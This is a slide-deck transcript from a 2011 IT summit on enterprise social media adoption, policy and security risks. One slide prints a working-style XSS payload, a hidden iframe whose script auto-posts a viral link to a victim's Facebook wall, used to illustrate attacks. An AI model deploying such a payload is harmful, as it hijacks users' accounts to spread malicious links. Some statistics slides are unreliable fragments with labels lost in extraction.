This document discusses social media infiltration in enterprises. It begins by defining social media and highlighting its widespread adoption, with billions of users on Facebook, Twitter and LinkedIn. The presenter argues that enterprises must embrace social media as that is where customers and prospects are increasingly engaging. Both opportunities and risks of social media for businesses are covered. The presentation emphasizes establishing social media policies and strategies to manage risks and prevent potential disasters, while leveraging benefits like improved collaboration and marketing reach. It concludes by arguing that doing nothing is not an option for enterprises, and a formal approach is needed to mitigate new security risks introduced by social media.

1. SOCIAL MEDIA:
INFILTRATING THE
ENTERPRISE
MIDTECH IT Summit
June 27th, 2011
JAY A. MCLAUGHLIN, CISSP
SVP, CHIEF INFORMATION OFFICER

2. DISCLAIMER
The materials, thoughts, comments, ideas
and opinions expressed throughout this
presentation are entirely my own and do
not necessarily represent the thoughts or
opinions of my employer (past or present).

3. AGENDA
• Defining social media
• Embracing the Inevitable
• Understanding the Benefits Risks
• Friending your Customers
• Preventing social media disasters
• Building a strategy

4. : forms of electronic communication (as Web sites
for social networking and microblogging) through
which users create online communities to share
information, ideas, personal messages, and other
content
What is Social
Media?
Social media is media for social interaction using
highly accessible and scalable communication
techniques. Social media is the use of web-based
and mobile technologies to turn communication
into interactive dialogue.

6. • 500 Million
• 250 Million
• 700 Billion
Source: Facebook.com April 2011

7. It s Corporate

8. • 6939
• 319
• 140 Million
Source: Twitter. com March 2011

9. It s Mainstream

10. • 100 Million
• 2 Million
• 4.3 Billion
Source: LinkedIn.com May 2011

12. WHY SHOULD WE CARE?
• It's where your customers are
• It's where your prospects are
• It's
reach stretches further broader than any
marketing channel
• It's relevant to be in the game

13. We don t have a choice
on whether we will DO
social media, the question
is how WELL we DO it.
- Erik Qualman, Author
Socialnomics
http://www.youtube.com/user/Socialnomics09?blend=1ob=5

14. * companies that have 100 or more employees
Source: eMarketer, Nov
2010

15. Enhanced
Collaboration
Shared Faster access to
BUSINESS Workspaces
Information
BENEFITS
Extended Organizational Reach
Compete
Ability to

16. • When leveraged effectively,
social networks become an
THE
equalizer, leveling the playing EQUALIZER
field
• Itallows organizations both
large and small to compete
and be relevant in their space
• Ability
to influence with little
or not cost

17. UNANTICIPATED DISASTERS

18. PREVENTING DISASTERS

19. IS YOUR ORGANIZATION
PREPARED FOR...?
• Employees posting opinions about the organization
• Managing brand reputation and public opinion/
exposure
• Responding to positive and negative feedback from
customers
• Standing by the decision NOT to get engaged....?

20. SOCIAL MEDIA SWOT
• Strength - ability to build • Weakness - silo-ed as a
relationships with your business function and not
target audience like never integrated in overall
before.
business strategy.
• Opportunities - its • Threat - fear of losing
where our customers control. Seeks risk aversion.
are. Integration with the Non-innovative.
business is key.

21. ESTABLISHING A POLICY
?

22. THE BASICS
• Doyour employees know what is acceptable or
permitted?
• How may (or not) employees identify themselves?
• To what degree can corporate content be used?
• Hasyour organization determined what is can do
with information obtained through social media?
Establishing a policy is critical!

23. ESTABLISH A STRATEGY
• Governance required implement and enforce acceptable
usage policy covering social networking sites
• It
is key that all staff receive security awareness training
covering your acceptable usage policy for social
networking
• Promote good practices to help improve users behavior
ultimately reducing and/or mitigating some of the risks
• Permit access only to social networking sites that have
obvious business benefits only to users with a business
need

24. ESTABLISH A STRATEGY
• Institute processes to manage and monitor activity
• Be flexible - overall uncertainty about what strategies and
tactics to adopt to security social media
• Understand and identify which users create the most
amount of risk?
• Create reasonable guidelines that can be followed
• Review sites terms and conditions to understand risks
associated with each site

25. REGULATION is coming
For regulated industries, what
requirements do you face?
ex. FINRA
Employers know ALOT about
their employees/candidates

26. HR: OBTAINING INFORMATION FROM
SOCIAL NETWORKS
• HRis tempted to peak at these sites to gather information
about employees and potential candidates
• Consider discrimination lawsuits! Proceed with caution.
- ex: viewing the online photo/picture of a candidate
• Consistency is KING - it will minimize your risk.
- ex: if conducting a search for ONE candidate, then do so for ALL
• Evenif employers have the technical capability to gain access
to social networking information of their employees or
candidates, it does not imply the legal right to do so.

27. consider ALL risks
Is there a need to address how to evaluate the risk of
sharing too much information online in relation to the
value it brings to the business?

28. Security Concerns
• There is a continued growth in social networking sites
being used as an attack distribution platform
• Users are less likely to see malware when it is passed
on by a friend as it has a certain level of authenticity
and a level of trust
• Social networks give attackers a potentially powerful
point of leverage, sometimes allowing them to launch
sophisticated attacks against businesses
• Known weaknesses exist in the security of the
networks themselves, which limit our control

30. Threatscape of sites
• Session-hijacking / authentication weaknesses
• Profile harvesting leading to social engineering
- ex: phishing / spear-phishing
• Cross-site scripting (XSS) / Cross-site request forgery
(CSRF)
• Malicious code / Malware
- ex: drive-by downloads

31. XSS Example
iframe id= CrazyDaVinci
style= display:none; src= http://
m.facebook.com/connect/prompt_feed.php?
display=wapuser_message_prompt= script
window.onload=function(){document.forms
[0].message.value= Just visited
http://y.ahoo.it/gajeBA Wow.. cool! nice page
dude!!! ;document.forms[0].submit();}/
script /iframe
• this bit of HTML/Javascript would be included in a viral page.
• the code sets the content of the wall post to a message that
includes a link to a viral page, then submits the prompt automatically.

32. Microsoft has documented a
steady rise in the number of
attacks targeting social networks
Primary vectors:
• Phishing attempts
• Social engineering tactics
Instances of Phishing impressions increased from 8.3% to 84.5%

33. Verizon highlighted in its 2011
DBIR, that malware and social
engineering to have been the
culprit for 60% of all reported
attacks/breaches
Contribution of malware:
• 49% of breaches
• 79% of records stolen

34. PROTECT SERVE
Policing Social Media:
How do we protect the usage of social networks?

35. Policing Social Media
• Is it possible to establish and implement a standard set
of guidelines for enterprise users?
• ...that would help to not only prevent data leaks, but
also keep emerging social networking malware at bay?
• It requires a combination of technical, behavioral
and organizational security controls

36. CONCLUSION
• Social media isn t a choice anyone….recognize it is
a business transformation tool
• Perform a comprehensive risk assessment against all
social networks that will be considered for use
• Social networks DO introduce new security risks -
take a formal approach to mitigate them through
policy enforcement and user education
• Doing nothing is not an option...will you take that
risk?

37. QUESTIONS?
Contact Info:
linkedin.com/
jaymclaughlin
@jaymclaughlin